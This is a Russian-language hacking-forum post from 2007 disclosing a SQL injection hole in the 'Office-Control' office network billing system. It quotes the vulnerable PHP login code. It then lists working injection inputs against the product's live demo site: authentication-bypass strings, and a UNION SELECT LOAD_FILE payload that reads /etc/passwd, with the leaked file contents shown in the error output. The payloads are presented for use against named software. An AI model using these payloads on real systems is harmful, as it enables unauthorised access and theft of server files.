HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Office-Control
  #1  
Старый 23.11.2007, 02:38
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами: 10487223

Репутация: 490
По умолчанию Office-Control

Система "Office-Control" предназначена для управления, биллинга и защиты сетей офисов

первое что сразу же попалось на глаза:

http://office-control.org/svn/repos/client_web/www/classes/base/session.php

PHP код:
    public function Login($strUsername$strPlainPassword$admin=0) {
        
$strMD5Password md5($strPlainPassword);
        if (
$admin==0)
              
$stmt "select id FROM clients WHERE login = '$strUsername' AND password = '$strMD5Password'";
          else
            
$stmt "select id FROM admins WHERE login = '$strUsername' AND password = '$strMD5Password'"
client.office-control.org - Демо-версия WEB-клиента. имя - new, пароль - 123.

Вход без пароля:

Код:
Login: ' or 1=1/*
Password: never mind

Login: 123'/*
Password: never mind
Есть права для работы с файлами:

Код:
Login: a' union select LOAD_FILE('/etc/passwd')/*
Password: never mind
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ':x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon' at line 1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Microsoft завершила разработку Office 2007 †Romi4† Мировые новости. Обсуждения. 0 07.11.2006 01:26
Microsoft завершает тестирование Office 2007 system_32 Мировые новости. Обсуждения. 0 10.10.2006 06:16
Покупателям новых ПК Microsoft предложит "тест-драйв" Office 2007 Dracula4ever Мировые новости. Обсуждения. 0 14.07.2006 16:02
Российским айтишникам показали Office 12 dinar_007 Мировые новости. Обсуждения. 0 09.12.2005 16:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...